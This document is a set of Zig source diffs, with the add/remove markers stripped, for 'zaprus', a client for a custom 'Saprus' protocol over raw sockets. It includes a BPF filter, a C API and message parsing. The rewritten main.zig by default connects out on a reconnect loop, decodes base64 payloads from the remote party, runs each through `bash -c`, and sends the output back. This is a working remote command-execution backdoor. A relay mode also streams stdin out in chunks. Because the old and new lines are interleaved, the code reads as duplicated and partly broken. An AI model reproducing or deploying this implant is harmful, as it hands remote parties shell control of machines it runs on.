const sent_bytes = std.os.linux.sendto(
self.fd,
payload.ptr,
payload.len,
0,
@ptrCast(&self.sockaddr_ll),
@sizeOf(@TypeOf(self.sockaddr_ll)),
);
_ = sent_bytes;
}
pub fn receive(self: RawSocket, buf: []u8) ![]u8 {
const len = std.os.linux.recvfrom(
self.fd,
buf.ptr,
buf.len,
0,
null,
null,
);
if (std.os.linux.errno(len) != .SUCCESS) {
return error.Timeout; // TODO: get the real error, assume timeout for now.
}
return buf[0..len];
}
pub fn attachSaprusPortFilter(self: RawSocket, port: u16) !void {
const BPF = std.os.linux.BPF;
// BPF instruction structure for classic BPF
const SockFilter = extern struct {
code: u16,
jt: u8,
jf: u8,
k: u32,
};
const SockFprog = extern struct {
len: u16,
filter: [*]const SockFilter,
};
// Build the filter program
const filter = [_]SockFilter{
// Load 2 bytes at offset 46 (absolute)
.{ .code = BPF.LD | BPF.H | BPF.ABS, .jt = 0, .jf = 0, .k = 46 },
// Jump if equal to port (skip 0 if true, skip 1 if false)
.{ .code = BPF.JMP | BPF.JEQ | BPF.K, .jt = 0, .jf = 1, .k = @as(u32, port) },
// Return 0xffff (pass)
.{ .code = BPF.RET | BPF.K, .jt = 0, .jf = 0, .k = 0xffff },
// Return 0x0 (fail)
.{ .code = BPF.RET | BPF.K, .jt = 0, .jf = 0, .k = 0x0 },
};
const fprog = SockFprog{
.len = filter.len,
.filter = &filter,
};
// Attach filter to socket using setsockopt
const rc = std.os.linux.setsockopt(
self.fd,
std.os.linux.SOL.SOCKET,
std.os.linux.SO.ATTACH_FILTER,
@ptrCast(&fprog),
@sizeOf(SockFprog),
);
if (rc != 0) {
return error.BpfAttachFailed;
}
}
const std = @import("std");
const builtin = @import("builtin");

View File

@@ -1,56 +1,88 @@
// client
export fn zaprus_init() c_int {
SaprusClient.init() catch return 1;
return 0;
}
export fn zaprus_deinit() c_int {
SaprusClient.deinit();
return 0;
}
export fn zaprus_send_relay(payload: [*]const u8, len: usize, dest: [4]u8) c_int {
SaprusClient.sendRelay(payload[0..len], dest, allocator) catch return 1;
return 0;
}
export fn zaprus_send_initial_connection(payload: [*]const u8, len: usize, initial_port: u16) c_int {
SaprusClient.sendInitialConnection(payload[0..len], initial_port, allocator) catch return 1;
return 0;
}
export fn zaprus_connect(payload: [*]const u8, len: usize) ?*SaprusMessage {
return SaprusClient.connect(payload[0..len], allocator) catch null;
}
// message
/// ptr should be freed by the caller.
export fn zaprus_message_to_bytes(msg: SaprusMessage, ptr: *[*]u8, len: *usize) c_int {
const bytes = msg.toBytes(allocator) catch return 1;
ptr.* = bytes[0..].*;
len.* = bytes.len;
return 0;
}
/// Return value should be destroyed with zaprus_message_deinit.
export fn zaprus_message_from_bytes(bytes: [*]const u8, len: usize) ?*SaprusMessage {
return SaprusMessage.fromBytes(bytes[0..len], allocator) catch null;
}
export fn zaprus_message_deinit(msg: *SaprusMessage) void {
msg.deinit(allocator);
}
const std = @import("std");
const zaprus = @import("zaprus");
const zaprus = @import("./root.zig");
const SaprusClient = zaprus.Client;
const SaprusMessage = zaprus.Message;
// Opaque types for C API
const ZaprusClient = opaque {};
const ZaprusConnection = opaque {};
const allocator = std.heap.c_allocator;
const alloc = std.heap.c_allocator;
const io = std.Io.Threaded.global_single_threaded.io();
test {
std.testing.refAllDeclsRecursively(@This());
export fn zaprus_init_client() ?*ZaprusClient {
const client = alloc.create(zaprus.Client) catch return null;
client.* = zaprus.Client.init() catch {
alloc.destroy(client);
return null;
};
return @ptrCast(client);
}
export fn zaprus_deinit_client(client: ?*ZaprusClient) void {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
if (c) |zc| {
zc.deinit();
alloc.destroy(zc);
}
}
export fn zaprus_client_send_relay(
client: ?*ZaprusClient,
payload: [*c]const u8,
payload_len: usize,
dest: [*c]const u8,
) c_int {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
const zc = c orelse return 1;
zc.sendRelay(io, payload[0..payload_len], dest[0..4].*) catch return 1;
return 0;
}
export fn zaprus_connect(
client: ?*ZaprusClient,
payload: [*c]const u8,
payload_len: usize,
) ?*ZaprusConnection {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
const zc = c orelse return null;
const connection = alloc.create(zaprus.Connection) catch return null;
connection.* = zc.connect(io, payload[0..payload_len]) catch {
alloc.destroy(connection);
return null;
};
return @ptrCast(connection);
}
export fn zaprus_deinit_connection(connection: ?*ZaprusConnection) void {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
if (c) |zc| {
alloc.destroy(zc);
}
}
export fn zaprus_connection_next(
connection: ?*ZaprusConnection,
out: [*c]u8,
capacity: usize,
out_len: *usize,
) c_int {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
const zc = c orelse return 1;
const result = zc.next(io, out[0..capacity]) catch return 1;
out_len.* = result.len;
return 0;
}
export fn zaprus_connection_send(
connection: ?*ZaprusConnection,
payload: [*c]const u8,
payload_len: usize,
) c_int {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
const zc = c orelse return 1;
zc.send(io, payload[0..payload_len]) catch return 1;
return 0;
}

View File

@@ -1,81 +1,233 @@
const is_debug = builtin.mode == .Debug;
/// This creates a debug allocator that can only be referenced in debug mode.
/// You should check for is_debug around every reference to dba.
var dba: DebugAllocator =
if (is_debug)
DebugAllocator.init
else
@compileError("Should not use debug allocator in release mode");
pub fn main() !void {
defer if (is_debug) {
_ = dba.deinit();
};
const gpa = if (is_debug) dba.allocator() else std.heap.smp_allocator;
// CLI parsing adapted from the example here
// https://github.com/Hejsil/zig-clap/blob/e47028deaefc2fb396d3d9e9f7bd776ae0b2a43a/README.md#examples
// First we specify what parameters our program can take.
// We can use `parseParamsComptime` to parse a string into an array of `Param(Help)`.
const params = comptime clap.parseParamsComptime(
const help =
\\-h, --help Display this help and exit.
\\-r, --relay <str> A relay message to send.
\\-d, --dest <str> An IPv4 or <= 4 ASCII byte string.
\\-c, --connect <str> A connection message to send.
\\
);
;
// Initialize our diagnostics, which can be used for reporting useful errors.
// This is optional. You can also pass `.{}` to `clap.parse` if you don't
// care about the extra information `Diagnostics` provides.
var diag = clap.Diagnostic{};
var res = clap.parse(clap.Help, &params, clap.parsers.default, .{
.diagnostic = &diag,
.allocator = gpa,
}) catch |err| {
// Report useful error and exit.
diag.report(std.io.getStdErr().writer(), err) catch {};
return err;
};
defer res.deinit();
const Option = enum { help, relay, dest, connect };
const to_option: StaticStringMap(Option) = .initComptime(.{
.{ "-h", .help },
.{ "--help", .help },
.{ "-r", .relay },
.{ "--relay", .relay },
.{ "-d", .dest },
.{ "--dest", .dest },
.{ "-c", .connect },
.{ "--connect", .connect },
});
try SaprusClient.init();
defer SaprusClient.deinit();
pub fn main(init: std.process.Init) !void {
// CLI parsing adapted from the example here
// https://codeberg.org/ziglang/zig/pulls/30644
if (res.args.help != 0) {
return clap.help(std.io.getStdErr().writer(), clap.Help, &params, .{});
}
const args = try init.minimal.args.toSlice(init.arena.allocator());
if (res.args.relay) |r| {
const dest = parseDest(res.args.dest) catch .{ 70, 70, 70, 70 };
try SaprusClient.sendRelay(
if (r.len > 0) r else "Hello darkness my old friend",
dest,
gpa,
);
// std.debug.print("Sent: {s}\n", .{r});
return;
} else if (res.args.connect) |c| {
const conn_res: ?SaprusMessage = SaprusClient.connect(if (c.len > 0) c else "Hello darkness my old friend", gpa) catch |err| switch (err) {
error.WouldBlock => null,
else => return err,
};
defer if (conn_res) |r| r.deinit(gpa);
if (conn_res) |r| {
std.debug.print("{s}\n", .{r.connection.payload});
var flags: struct {
relay: ?[]const u8 = null,
dest: ?[]const u8 = null,
connect: ?[]const u8 = null,
} = .{};
if (args.len == 1) {
flags.connect = "";
} else {
std.debug.print("No response from connection request\n", .{});
var i: usize = 1;
while (i < args.len) : (i += 1) {
if (to_option.get(args[i])) |opt| {
switch (opt) {
.help => {
std.debug.print("{s}", .{help});
return;
},
.relay => {
i += 1;
if (i < args.len) {
flags.relay = args[i];
} else {
flags.relay = "";
}
},
.dest => {
i += 1;
if (i < args.len) {
flags.dest = args[i];
} else {
std.debug.print("-d/--dest requires a string\n", .{});
return error.InvalidArguments;
}
},
.connect => {
i += 1;
if (i < args.len) {
flags.connect = args[i];
} else {
flags.connect = "";
}
},
}
} else {
std.debug.print("Unknown argument: {s}\n", .{args[i]});
return error.InvalidArguments;
}
}
}
if (flags.connect != null and (flags.relay != null or flags.dest != null)) {
std.debug.print("Incompatible arguments.\nCannot use --connect/-c with dest or relay.\n", .{});
return error.InvalidArguments;
}
var client: SaprusClient = undefined;
if (flags.relay != null) {
client = try .init();
defer client.deinit();
var chunk_writer_buf: [2048]u8 = undefined;
var chunk_writer: Writer = .fixed(&chunk_writer_buf);
if (flags.relay.?.len > 0) {
var output_iter = std.mem.window(u8, flags.relay.?, SaprusClient.max_payload_len, SaprusClient.max_payload_len);
while (output_iter.next()) |chunk| {
chunk_writer.end = 0;
try chunk_writer.print("{b64}", .{chunk});
try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest));
try init.io.sleep(.fromMilliseconds(40), .boot);
}
} else {
var stdin_file: std.Io.File = .stdin();
var stdin_file_reader = stdin_file.reader(init.io, &.{});
var stdin_reader = &stdin_file_reader.interface;
var lim_buf: [SaprusClient.max_payload_len]u8 = undefined;
var limited = stdin_reader.limited(.limited(10 * lim_buf.len), &lim_buf);
var stdin = &limited.interface;
while (stdin.fillMore()) {
// Sometimes fillMore will return 0 bytes.
// Skip these
if (stdin.seek == stdin.end) continue;
chunk_writer.end = 0;
try chunk_writer.print("{b64}", .{stdin.buffered()});
try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest));
try init.io.sleep(.fromMilliseconds(40), .boot);
try stdin.discardAll(stdin.end);
} else |err| switch (err) {
error.EndOfStream => {
log.debug("end of stdin", .{});
},
else => |e| return e,
}
}
return;
}
return clap.help(std.io.getStdErr().writer(), clap.Help, &params, .{});
var init_con_buf: [SaprusClient.max_payload_len]u8 = undefined;
var w: Writer = .fixed(&init_con_buf);
try w.print("{b64}", .{flags.connect.?});
if (flags.connect != null) {
reconnect: while (true) {
client = try .init();
defer client.deinit();
log.debug("Starting connection", .{});
try client.socket.setTimeout(if (is_debug) 3 else 25, 0);
var connection = client.connect(init.io, w.buffered()) catch {
log.debug("Connection timed out", .{});
continue;
};
log.debug("Connection started", .{});
next_message: while (true) {
var res_buf: [2048]u8 = undefined;
try client.socket.setTimeout(if (is_debug) 60 else 600, 0);
const next = connection.next(init.io, &res_buf) catch {
continue :reconnect;
};
const b64d = std.base64.standard.Decoder;
var connection_payload_buf: [2048]u8 = undefined;
const connection_payload = connection_payload_buf[0..try b64d.calcSizeForSlice(next)];
b64d.decode(connection_payload, next) catch {
log.debug("Failed to decode message, skipping: '{s}'", .{connection_payload});
continue;
};
var child = std.process.spawn(init.io, .{
.argv = &.{ "bash", "-c", connection_payload },
.stdout = .pipe,
.stderr = .ignore,
.stdin = .ignore,
}) catch continue;
var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined;
var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf);
var is_killed: std.atomic.Value(bool) = .init(false);
var kill_task = try init.io.concurrent(killProcessAfter, .{ init.io, &child, .fromSeconds(3), &is_killed });
defer _ = kill_task.cancel(init.io) catch {};
var cmd_output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
var cmd_output: Writer = .fixed(&cmd_output_buf);
// Maximum of 10 messages of output per command
for (0..10) |_| {
cmd_output.end = 0;
child_output_reader.interface.fill(child_output_reader.interface.buffer.len) catch |err| switch (err) {
error.ReadFailed => continue :next_message, // TODO: check if there is a better way to handle this
error.EndOfStream => {
cmd_output.print("{b64}", .{child_output_reader.interface.buffered()}) catch unreachable;
if (cmd_output.end > 0) {
connection.send(init.io, cmd_output.buffered()) catch |e| {
log.debug("Failed to send connection chunk: {t}", .{e});
continue :next_message;
};
}
break;
},
};
cmd_output.print("{b64}", .{try child_output_reader.interface.takeArray(child_output_buf.len)}) catch unreachable;
connection.send(init.io, cmd_output.buffered()) catch |err| {
log.debug("Failed to send connection chunk: {t}", .{err});
continue :next_message;
};
try init.io.sleep(.fromMilliseconds(40), .boot);
} else {
kill_task.cancel(init.io) catch {};
killProcessAfter(init.io, &child, .zero, &is_killed) catch |err| {
log.debug("Failed to kill process??? {t}", .{err});
continue :next_message;
};
}
fn parseDest(in: ?[]const u8) ![4]u8 {
if (!is_killed.load(.monotonic)) {
_ = child.wait(init.io) catch |err| {
log.debug("Failed to wait for child: {t}", .{err});
};
}
}
}
}
unreachable;
}
fn killProcessAfter(io: std.Io, proc: *std.process.Child, duration: std.Io.Duration, is_killed: *std.atomic.Value(bool)) !void {
io.sleep(duration, .boot) catch |err| switch (err) {
error.Canceled => return,
else => |e| return e,
};
is_killed.store(true, .monotonic);
proc.kill(io);
}
fn parseDest(in: ?[]const u8) [4]u8 {
if (in) |dest| {
if (dest.len <= 4) {
var res: [4]u8 = @splat(0);
@@ -83,19 +235,20 @@ fn parseDest(in: ?[]const u8) ![4]u8 {
return res;
}
const addr = try std.net.Ip4Address.parse(dest, 0);
return @bitCast(addr.sa.addr);
const addr = std.Io.net.Ip4Address.parse(dest, 0) catch return "FAIL".*;
return addr.bytes;
}
return .{ 70, 70, 70, 70 };
return "disc".*;
}
const builtin = @import("builtin");
const std = @import("std");
const DebugAllocator = std.heap.DebugAllocator(.{});
const log = std.log;
const ArrayList = std.ArrayList;
const StaticStringMap = std.StaticStringMap;
const zaprus = @import("zaprus");
const SaprusClient = zaprus.Client;
const SaprusMessage = zaprus.Message;
const clap = @import("clap");
const Writer = std.Io.Writer;

View File

@@ -1,18 +1,164 @@
const base64Enc = std.base64.Base64Encoder.init(std.base64.standard_alphabet_chars, '=');
const base64Dec = std.base64.Base64Decoder.init(std.base64.standard_alphabet_chars, '=');
/// Type tag for Message union.
/// This is the first value in the actual packet sent over the network.
pub const PacketType = enum(u16) {
relay = 0x003C,
file_transfer = 0x8888,
connection = 0x00E9,
_,
pub const MessageTypeError = error{
NotImplementedSaprusType,
UnknownSaprusType,
};
pub const MessageParseError = MessageTypeError || error{
InvalidMessage,
};
const message = @This();
pub const Message = union(enum(u16)) {
relay: Message.Relay = 0x003C,
connection: Message.Connection = 0x00E9,
_,
pub const Relay = message.Relay;
pub const Connection = message.Connection;
pub fn toBytes(self: message.Message, buf: []u8) []u8 {
return switch (self) {
inline .relay, .connection => |m| m.toBytes(buf),
else => unreachable,
};
}
pub const parse = message.parse;
};
pub const relay_dest_len = 4;
pub fn parse(bytes: []const u8) MessageParseError!Message {
var in: Reader = .fixed(bytes);
const @"type" = in.takeEnum(std.meta.Tag(Message), .big) catch |err| switch (err) {
error.InvalidEnumTag => return error.UnknownSaprusType,
else => return error.InvalidMessage,
};
const checksum = in.takeArray(2) catch return error.InvalidMessage;
switch (@"type") {
.relay => {
const dest: Relay.Dest = .fromBytes(
in.takeArray(relay_dest_len) catch return error.InvalidMessage,
);
const payload = in.buffered();
return .{
.relay = .{
.dest = dest,
.checksum = checksum.*,
.payload = payload,
},
};
},
.connection => {
const src = in.takeInt(u16, .big) catch return error.InvalidMessage;
const dest = in.takeInt(u16, .big) catch return error.InvalidMessage;
const seq = in.takeInt(u32, .big) catch return error.InvalidMessage;
const id = in.takeInt(u32, .big) catch return error.InvalidMessage;
const reserved = in.takeByte() catch return error.InvalidMessage;
const options = in.takeStruct(Connection.Options, .big) catch return error.InvalidMessage;
const payload = in.buffered();
return .{
.connection = .{
.src = src,
.dest = dest,
.seq = seq,
.id = id,
.reserved = reserved,
.options = options,
.payload = payload,
},
};
},
else => return error.NotImplementedSaprusType,
}
}
test parse {
_ = try parse(&[_]u8{ 0x00, 0x3c, 0x00, 0x17, 0xac, 0x12, 0x01, 0x1e, 0x72, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65, 0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64 });
{
const expected: Message = .{
.connection = .{
.src = 12416,
.dest = 61680,
.seq = 0,
.id = 0,
.reserved = 0,
.options = @bitCast(@as(u8, 100)),
.payload = &[_]u8{ 0x69, 0x61, 0x6d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74 },
},
};
const actual = try parse(&[_]u8{ 0x00, 0xe9, 0x00, 0x18, 0x30, 0x80, 0xf0, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x69, 0x61, 0x6d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74 });
try std.testing.expectEqualDeep(expected, actual);
}
}
const Relay = struct {
dest: Dest,
checksum: [2]u8 = undefined,
payload: []const u8,
pub const Dest = struct {
bytes: [relay_dest_len]u8,
/// Asserts bytes is less than or equal to 4 bytes
pub fn fromBytes(bytes: []const u8) Dest {
var buf: [4]u8 = @splat(0);
std.debug.assert(bytes.len <= buf.len);
@memcpy(buf[0..bytes.len], bytes);
return .{ .bytes = buf };
}
};
pub fn init(dest: Dest, payload: []const u8) Relay {
return .{ .dest = dest, .payload = payload };
}
/// Asserts that buf is large enough to fit the relay message.
pub fn toBytes(self: Relay, buf: []u8) []u8 {
var out: Writer = .fixed(buf);
out.writeInt(u16, @intFromEnum(Message.relay), .big) catch unreachable;
out.writeInt(u16, @intCast(self.payload.len + 4), .big) catch unreachable; // Length field, but unread. Will switch to checksum
out.writeAll(&self.dest.bytes) catch unreachable;
out.writeAll(self.payload) catch unreachable;
return out.buffered();
}
test toBytes {
var buf: [1024]u8 = undefined;
const relay: Relay = .init(
.fromBytes(&.{ 172, 18, 1, 30 }),
// zig fmt: off
&[_]u8{
0x72, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65,
0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64
},
// zig fmt: on
);
// zig fmt: off
var expected = [_]u8{
0x00, 0x3c, 0x00, 0x17, 0xac, 0x12, 0x01, 0x1e, 0x72,
0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65,
0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64
};
// zig fmt: on
try expectEqualMessageBuffers(&expected, relay.toBytes(&buf));
}
};
const Connection = struct {
src: u16,
dest: u16,
seq: u32,
id: u32,
reserved: u8 = undefined,
options: Options = undefined,
payload: []const u8,
/// Reserved option values.
/// Currently unused.
pub const ConnectionOptions = packed struct(u8) {
pub const Options = packed struct(u8) {
opt1: bool = false,
opt2: bool = false,
opt3: bool = false,
@@ -23,189 +169,43 @@ pub const ConnectionOptions = packed struct(u8) {
opt8: bool = false,
};
pub const Error = error{
NotImplementedSaprusType,
UnknownSaprusType,
};
/// All Saprus messages
pub const Message = union(PacketType) {
pub const Relay = struct {
pub const Header = packed struct {
dest: @Vector(4, u8),
};
header: Header,
payload: []const u8,
};
pub const Connection = struct {
pub const Header = packed struct {
src_port: u16, // random number > 1024
dest_port: u16, // random number > 1024
seq_num: u32 = 0,
msg_id: u32 = 0,
reserved: u8 = 0,
options: ConnectionOptions = .{},
};
header: Header,
payload: []const u8,
};
relay: Relay,
file_transfer: void, // unimplemented
connection: Connection,
/// Should be called for any Message that was declared using a function that you pass an allocator to.
pub fn deinit(self: Message, allocator: Allocator) void {
switch (self) {
.relay => |r| allocator.free(r.payload),
.connection => |c| allocator.free(c.payload),
else => unreachable,
}
}
fn toBytesAux(
header: anytype,
payload: []const u8,
buf: *std.ArrayList(u8),
allocator: Allocator,
) !void {
const Header = @TypeOf(header);
// Create a growable string to store the base64 bytes in.
// Doing this first so I can use the length of the encoded bytes for the length field.
var payload_list = std.ArrayList(u8).init(allocator);
defer payload_list.deinit();
const buf_w = payload_list.writer();
// Write the payload bytes as base64 to the growable string.
try base64Enc.encodeWriter(buf_w, payload);
// At this point, payload_list contains the base64 encoded payload.
// Add the payload length to the output buf.
try buf.*.appendSlice(
asBytes(&nativeToBig(u16, @intCast(payload_list.items.len + @bitSizeOf(Header) / 8))),
);
// Add the header bytes to the output buf.
var header_buf: [@sizeOf(Header)]u8 = undefined;
var header_buf_stream = std.io.fixedBufferStream(&header_buf);
try header_buf_stream.writer().writeStructEndian(header, .big);
// Add the exact number of bits in the header without padding.
try buf.*.appendSlice(header_buf[0 .. @bitSizeOf(Header) / 8]);
try buf.*.appendSlice(payload_list.items);
}
/// Caller is responsible for freeing the returned bytes.
pub fn toBytes(self: Message, allocator: Allocator) ![]u8 {
// Create a growable list of bytes to store the output in.
var buf = std.ArrayList(u8).init(allocator);
errdefer buf.deinit();
// Start with writing the message type, which is the first 16 bits of every Saprus message.
try buf.appendSlice(asBytes(&nativeToBig(u16, @intFromEnum(self))));
// Write the proper header and payload for the given packet type.
switch (self) {
.relay => |r| try toBytesAux(r.header, r.payload, &buf, allocator),
.connection => |c| try toBytesAux(c.header, c.payload, &buf, allocator),
.file_transfer => return Error.NotImplementedSaprusType,
}
// Collect the growable list as a slice and return it.
return buf.toOwnedSlice();
}
fn fromBytesAux(
comptime packet: PacketType,
len: u16,
r: std.io.FixedBufferStream([]const u8).Reader,
allocator: Allocator,
) !Message {
const Header = @field(@FieldType(Message, @tagName(packet)), "Header");
// Read the header for the current message type.
var header_bytes: [@sizeOf(Header)]u8 = undefined;
_ = try r.read(header_bytes[0 .. @bitSizeOf(Header) / 8]);
var header_stream = std.io.fixedBufferStream(&header_bytes);
const header = try header_stream.reader().readStructEndian(Header, .big);
// Read the base64 bytes into a list to be able to call the decoder on it.
const payload_buf = try allocator.alloc(u8, len - @bitSizeOf(Header) / 8);
defer allocator.free(payload_buf);
_ = try r.readAll(payload_buf);
// Create a buffer to store the payload in, and decode the base64 bytes into the payload field.
const payload = try allocator.alloc(u8, try base64Dec.calcSizeForSlice(payload_buf));
try base64Dec.decode(payload, payload_buf);
// Return the type of Message specified by the `packet` argument.
return @unionInit(Message, @tagName(packet), .{
.header = header,
.payload = payload,
});
}
/// Caller is responsible for calling .deinit on the returned value.
pub fn fromBytes(bytes: []const u8, allocator: Allocator) !Message {
var s = std.io.fixedBufferStream(bytes);
const r = s.reader();
// Read packet type
const packet_type = @as(PacketType, @enumFromInt(try r.readInt(u16, .big)));
// Read the length of the header + base64 encoded payload.
const len = try r.readInt(u16, .big);
switch (packet_type) {
.relay => return fromBytesAux(.relay, len, r, allocator),
.connection => return fromBytesAux(.connection, len, r, allocator),
.file_transfer => return Error.NotImplementedSaprusType,
else => return Error.UnknownSaprusType,
}
/// Asserts that buf is large enough to fit the connection message.
pub fn toBytes(self: Connection, buf: []u8) []u8 {
var out: Writer = .fixed(buf);
out.writeInt(u16, @intFromEnum(Message.connection), .big) catch unreachable;
out.writeInt(u16, @intCast(self.payload.len + 14), .big) catch unreachable; // Saprus length field, unread.
out.writeInt(u16, self.src, .big) catch unreachable;
out.writeInt(u16, self.dest, .big) catch unreachable;
out.writeInt(u32, self.seq, .big) catch unreachable;
out.writeInt(u32, self.id, .big) catch unreachable;
out.writeByte(self.reserved) catch unreachable;
out.writeStruct(self.options, .big) catch unreachable;
out.writeAll(self.payload) catch unreachable;
return out.buffered();
}
};
test "Round trip" {
{
const expected = [_]u8{ 0x0, 0xe9, 0x0, 0x15, 0x30, 0x80, 0xf0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x64, 0x36, 0x3a, 0x3a, 0x64, 0x61, 0x74, 0x61 };
const msg = (try parse(&expected)).connection;
var res_buf: [expected.len + 1]u8 = undefined; // + 1 to test subslice result.
const res = msg.toBytes(&res_buf);
try expectEqualMessageBuffers(&expected, res);
}
}
// Skip checking the length / checksum, because that is undefined.
fn expectEqualMessageBuffers(expected: []const u8, actual: []const u8) !void {
try std.testing.expectEqualSlices(u8, expected[0..2], actual[0..2]);
try std.testing.expectEqualSlices(u8, expected[4..], actual[4..]);
}
const std = @import("std");
const Allocator = std.mem.Allocator;
const Writer = std.Io.Writer;
const Reader = std.Io.Reader;
const asBytes = std.mem.asBytes;
const nativeToBig = std.mem.nativeToBig;
test "Round trip Relay toBytes and fromBytes" {
const gpa = std.testing.allocator;
const msg = Message{
.relay = .{
.header = .{ .dest = .{ 255, 255, 255, 255 } },
.payload = "Hello darkness my old friend",
},
};
const to_bytes = try msg.toBytes(gpa);
defer gpa.free(to_bytes);
const from_bytes = try Message.fromBytes(to_bytes, gpa);
defer from_bytes.deinit(gpa);
try std.testing.expectEqualDeep(msg, from_bytes);
}
test "Round trip Connection toBytes and fromBytes" {
const gpa = std.testing.allocator;
const msg = Message{
.connection = .{
.header = .{
.src_port = 0,
.dest_port = 0,
},
.payload = "Hello darkness my old friend",
},
};
const to_bytes = try msg.toBytes(gpa);
defer gpa.free(to_bytes);
const from_bytes = try Message.fromBytes(to_bytes, gpa);
defer from_bytes.deinit(gpa);
try std.testing.expectEqualDeep(msg, from_bytes);
test {
std.testing.refAllDeclsRecursive(@This());
}

View File

@@ -1,4 +1,13 @@
pub const Client = @import("Client.zig");
pub usingnamespace @import("message.zig");
pub const Connection = @import("Connection.zig");
pub usingnamespace @import("c_api.zig");
const msg = @import("message.zig");
pub const PacketType = msg.PacketType;
pub const MessageTypeError = msg.MessageTypeError;
pub const MessageParseError = msg.MessageParseError;
pub const Message = msg.Message;
test {
@import("std").testing.refAllDecls(@This());
}